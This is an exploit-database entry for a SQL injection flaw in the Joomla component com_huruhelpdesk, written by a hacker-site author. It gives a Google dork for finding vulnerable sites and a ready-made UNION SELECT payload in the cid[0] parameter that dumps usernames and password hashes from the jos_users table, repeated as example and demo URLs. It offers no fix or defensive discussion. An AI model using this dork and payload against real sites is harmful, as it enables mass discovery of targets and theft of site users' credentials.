Joomla Component com_huruhelpdesk SQL Injection Vulnerability

2010-07-23T00:00:00
ID 1337DAY-ID-13451
Type zdt
Reporter Amine_92
Modified 2010-07-23T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            =============================================================
Joomla Component com_huruhelpdesk SQL Injection Vulnerability
=============================================================


Author :   Amine_92
Email  : [[email protected]]
Homepage : { www.vbhacker.net/vb }
DORK    :  inurl:"index.php?option=com_huruhelpdesk"
===================================================
 
[+] Vulnerable File :
http://www.Victime.com/index.php?option=com_huruhelpdesk&view=detail&cid[0]=[SQL]
 
[+] ExploiT :
-1/**/union/**/select/**/1,2,3,concat%28username,0x3a,password%29,5,6,7+from+jos_users--
 
[+] Example :
http://www.Victime.com/index.php?option=com_huruhelpdesk&view=detail&cid[0]=-1/**/union/**/select/**/1,2,3,concat%28username,0x3a,password%29,5,6,7+from+jos_users--
[+] Demo :
http://www.Victime.com/index.php?option=com_huruhelpdesk&view=detail&cid[0]=-1/**/union/**/select/**/1,2,3,concat%28username,0x3a,password%29,5,6,7+from+jos_users--
 
====================================================
Thank's to :awras,italiano_capilo & all my friends



#  0day.today [2018-04-09]  #